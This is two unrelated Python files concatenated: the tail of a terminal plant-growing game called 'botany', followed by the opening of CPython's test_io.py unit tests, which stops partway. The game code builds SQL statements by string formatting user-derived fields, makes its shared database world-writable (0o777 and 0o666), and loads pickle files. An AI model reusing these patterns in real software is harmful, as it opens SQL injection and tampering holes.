if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
# Increase plant growth stage
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
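            # Each generation past the first grows 20% faster (additively):
            # generation N sleeps 1 / (1 + 0.2 * (N - 1)) seconds per loop.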
generation_bonus = 0.2 * (self.generation - 1)
adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: .dat save should only happen on mutation, water, death, exit,
# harvest, otherwise
# data hasn't changed...
# can write json whenever bc this isn't ever read for data within botany
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
#set this.savefile_path to guest_garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates threads to save files every minute
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
# running on thread, saves plant every 5s TODO: this is unnecessary
# and breaks shit probably
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_watered = this_plant.water_check()
is_dead = this_plant.dead_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0o777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0o666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0o666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
# try to insert or replace
update_query = """INSERT OR REPLACE INTO garden (
plant_id, owner, description, age, score, is_dead
) VALUES (
'{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead}
)
""".format(pid = this_plant.plant_id,
pown = this_plant.owner,
pdes = this_plant.parse_plant(),
page = age_formatted,
psco = str(this_plant.ticks),
pdead = int(this_plant.dead))
c.execute(update_query)
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
pass
def save_plant(self, this_plant):
# create savefile
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
if __name__ == '__main__':
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
try:
botany_menu = CursedMenu(my_plant,my_data)
my_data.save_plant(my_plant)
my_data.data_write_json(my_plant)
my_data.update_garden_db(my_plant)
finally:
cleanup()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
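# For example, a minimal sketch of that pattern (the class names below are
# illustrative only, not taken from this file):
#
#     class ExampleBufferTest(unittest.TestCase):
#         # Subclasses provide the implementation under test as an attribute.
#         def test_roundtrip(self):
#             buf = self.BytesIO()
#             buf.write(b"data")
#             self.assertEqual(buf.getvalue(), b"data")
#
#     class CExampleBufferTest(ExampleBufferTest):
#         BytesIO = io.BytesIO
#
#     class PyExampleBufferTest(ExampleBufferTest):
#         BytesIO = pyio.BytesIO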
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.script_helper import assert_python_ok
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
self.assertRaises(TypeError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
        # a long time to build the >2 GB file and takes >2 GB of disk space,
        # therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally; a sketch of that delegation follows this test).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
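# The default read() exercised above can be understood as a thin layer over
# readinto(); the helper below is a minimal sketch of that delegation (an
# illustrative assumption, not the stdlib's exact implementation).
def _sketch_read_via_readinto(self, raw, size):
    # Allocate the requested amount and let readinto() fill it.
    buf = bytearray(size)
    n = raw.readinto(buf)
    if n is None:
        # Non-blocking raw stream had no data available.
        return None
    # Trim to what was actually read (b"" then signals EOF).
    return bytes(buf[:n])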
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have a fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
